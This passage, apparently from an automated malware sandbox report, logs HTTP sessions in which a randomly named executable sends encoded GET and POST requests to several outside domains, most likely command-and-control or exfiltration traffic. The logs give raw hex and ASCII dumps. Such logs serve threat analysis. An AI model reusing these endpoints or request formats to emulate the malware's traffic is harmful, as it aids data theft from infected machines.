                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.549993176.32.38.130803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:40.317555904 CET526OUTGET /j1io/?dfxXf=5pgPlrExEj&PLpD=G6oz2WtW4adnoUNHm0mpcP4B2HtbwCYrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSataAi40vaJPFabO5lnHnDp1UEVdOTWmoEEbAO8Jrg/lBqLiQ== HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:41.724189043 CET289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.550006161.97.168.245803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:47.550465107 CET784OUTPOST /qrcg/ HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 34 64 69 6e 42 53 6d 6d 73 5a 54 57 38 76 75 46 34 58 43 70 64 2b 65 2b 33 66 31 4d 46 39 4b 43 36 66 76 32 53 63 79 66 46 73 73 44 35 50 74 6f 34 34 6b 6b 2b 47 52 6e 42 54 54 73 43 42 72 32 73 74 44 68 74 43 70 50 6e 74 4f 54 75 47 45 68 64 41 42 49 50 39 79 79 4c 62 37 71 6e 67 33 4b 56 46 46 4b 64 41 55 38 70 33 71 48 34 62 65 65 59 58 54 37 44 58 6d 4f 6d 33 57 32 79 59 4b 4d 36 39 48 6a 72 77 4d 70 34 76 65 57 65 71 6b 2b 65 4b 41 30 64 55 68 51 6d 32 39 65 46 37 37 62 70 36 53 46 57 74 58 78 54 53 5a 73 4c 33 71 71 4b 50 70 72 73 42 35 66 46 54 61 32 2f 43 7a 7a 78 49 70 69 53 46 49 3d
                                                                                Data Ascii: PLpD=4dinBSmmsZTW8vuF4XCpd+e+3f1MF9KC6fv2ScyfFssD5Pto44kk+GRnBTTsCBr2stDhtCpPntOTuGEhdABIP9yyLb7qng3KVFFKdAU8p3qH4beeYXT7DXmOm3W2yYKM69HjrwMp4veWeqk+eKA0dUhQm29eF77bp6SFWtXxTSZsL3qqKPprsB5fFTa2/CzzxIpiSFI=
                                                                                Dec 3, 2024 14:15:48.792321920 CET1236INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:48 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: W/"66cd104a-b96"
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                Dec 3, 2024 14:15:48.792335987 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.550007161.97.168.245803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:50.212371111 CET804OUTPOST /qrcg/ HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 34 64 69 6e 42 53 6d 6d 73 5a 54 57 39 4f 2b 46 2b 77 57 70 66 65 65 2f 35 2f 31 4d 4f 64 4c 4c 36 66 6a 32 53 59 69 78 46 2b 34 44 34 72 68 6f 71 73 77 6b 7a 6d 52 6e 4f 44 54 74 50 68 71 36 73 74 50 66 74 48 4a 50 6e 75 79 54 75 44 34 68 64 7a 70 4c 64 64 79 30 44 37 37 73 6a 67 33 4b 56 46 46 4b 64 41 41 43 70 33 69 48 37 71 75 65 58 57 54 36 4f 33 6d 4a 6c 33 57 32 34 49 4b 58 36 39 48 56 72 78 51 50 34 73 6d 57 65 75 67 2b 66 62 41 33 4b 6b 68 53 6f 57 38 61 4e 70 2b 49 70 38 47 62 62 4c 57 44 45 6b 74 4d 48 68 62 41 51 74 68 44 2f 68 56 6e 56 41 53 42 75 79 53 61 72 72 35 53 4d 53 63 46 2f 4e 75 66 73 44 48 55 46 4d 72 50 49 65 7a 31 74 67 51 42
                                                                                Data Ascii: PLpD=4dinBSmmsZTW9O+F+wWpfee/5/1MOdLL6fj2SYixF+4D4rhoqswkzmRnODTtPhq6stPftHJPnuyTuD4hdzpLddy0D77sjg3KVFFKdAACp3iH7queXWT6O3mJl3W24IKX69HVrxQP4smWeug+fbA3KkhSoW8aNp+Ip8GbbLWDEktMHhbAQthD/hVnVASBuySarr5SMScF/NufsDHUFMrPIez1tgQB
                                                                                Dec 3, 2024 14:15:51.495095015 CET1236INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:51 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: W/"66cd104a-b96"
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                Dec 3, 2024 14:15:51.495193958 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.550008161.97.168.245803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:52.883647919 CET1821OUTPOST /qrcg/ HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 34 64 69 6e 42 53 6d 6d 73 5a 54 57 39 4f 2b 46 2b 77 57 70 66 65 65 2f 35 2f 31 4d 4f 64 4c 4c 36 66 6a 32 53 59 69 78 46 2b 41 44 35 65 39 6f 34 62 4d 6b 79 6d 52 6e 49 7a 54 6f 50 68 72 67 73 75 2f 6c 74 48 56 41 6e 6f 2b 54 38 57 30 68 56 69 70 4c 45 74 79 30 42 37 37 74 6e 67 32 51 56 46 31 4f 64 41 51 43 70 33 69 48 37 6f 32 65 54 48 54 36 64 6e 6d 4f 6d 33 57 36 79 59 4c 5a 36 39 66 46 72 78 45 35 35 63 47 57 65 4b 45 2b 59 70 34 33 49 45 68 71 6c 32 38 38 4e 6f 44 51 70 34 6d 58 62 4c 4b 70 45 6a 5a 4d 44 48 2f 59 41 2b 64 75 70 69 6c 71 53 43 61 67 35 48 4f 6e 70 35 31 6f 50 79 51 32 79 73 2b 52 6e 44 6a 62 41 50 2f 44 55 35 50 69 6c 46 52 6e 6b 71 59 71 71 37 53 79 43 66 41 2f 43 6a 67 62 68 6d 35 57 72 78 6c 44 4b 4c 4c 66 57 58 57 57 62 4c 4b 5a 30 6d 45 30 52 37 7a 56 64 38 35 72 77 53 6a 45 37 2f 6d 75 58 57 51 79 53 6c 65 51 65 57 65 36 2f 4a 69 66 4d 49 64 71 46 72 6a 31 62 54 6a 56 30 59 72 45 61 58 39 35 66 6e 53 59 64 74 65 67 46 57 7a 49 73 36 43 34 56 59 76 2f 6c [TRUNCATED]
                                                                                Data Ascii: PLpD=4dinBSmmsZTW9O+F+wWpfee/5/1MOdLL6fj2SYixF+AD5e9o4bMkymRnIzToPhrgsu/ltHVAno+T8W0hVipLEty0B77tng2QVF1OdAQCp3iH7o2eTHT6dnmOm3W6yYLZ69fFrxE55cGWeKE+Yp43IEhql288NoDQp4mXbLKpEjZMDH/YA+dupilqSCag5HOnp51oPyQ2ys+RnDjbAP/DU5PilFRnkqYqq7SyCfA/Cjgbhm5WrxlDKLLfWXWWbLKZ0mE0R7zVd85rwSjE7/muXWQySleQeWe6/JifMIdqFrj1bTjV0YrEaX95fnSYdtegFWzIs6C4VYv/laWZKYOtIo7PjWSrVKT/k0GoSE/OdkBPdd9KOVaApyN7D2LfurpDcTP3jpSvjaLtGFRvsFD2Mw/2XC64PGan/kpwem+ZH6cyBVxupcU/NdHv7V3WkvDDfZPwX91CIEsOc7di9A6WxEH3nhzJTHCX9P6kRf6NQU/3Vst9xU7NihPeyN+gtKKA6LAIXUPJl5tGdJtdg1YELuik3G+231GvWDM9A0saQWLMtMh+ylejz4aqy3Jz4t1+BpayX7SccWWO2r8Q08evg/NZt+WwBQ4KJ2I92QNvp7RSUGOym4lgIUMGbnbAu5MfZbejcp52Fc3dYqfvHeAmMtjcpCfJkDmdxqZKibS8sghjS6r4uz+73zPcxBfDV4gLMkgLPK9DLjucHi5w/K/92UPpxzMhgbnGdEjDSvE8R2hD5o04Hi5dPxhG//ynYBSfaPXra90aphicBiQmyZ7hSOqUO7DgTKqQDBbg4P+ZBYtbXWOYowJei2QgU7TcCxVMkzpjk/BjaQnMePByG6sS2e7lleqt5TARHxO3Qfsf12jpbTBWyV2fXgE1/0Xc102wST4JDSDz9JgoYaNrd4H4sdFKqJjpeNj2VOqFVosKhkFYO8vzNppOro3oRdG+p5ESnSWfyLaLHitJ3PpG/j9ungLgKy3RaVMpvmaxfnpfzJ8IBUr [TRUNCATED]
                                                                                Dec 3, 2024 14:15:54.185619116 CET1236INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:53 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: W/"66cd104a-b96"
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                Dec 3, 2024 14:15:54.185637951 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.550009161.97.168.245803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:55.552510023 CET523OUTGET /qrcg/?PLpD=1fKHCnrcuLb+woCu5SHdUNHs45cyPNHAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZHbinTcvoliy7Dmh5Jg4zqF2ez6vORVKEMmKyq03H3aWHiQ==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:56.847404003 CET1236INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:56 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 2966
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: "66cd104a-b96"
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                Dec 3, 2024 14:15:56.861588955 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                Dec 3, 2024 14:15:56.861603975 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                                Dec 3, 2024 14:15:56.861613989 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                                                Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.550010103.75.185.22803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:02.930191994 CET796OUTPOST /ydza/ HTTP/1.1
                                                                                Host: www.taxitayninh365.site
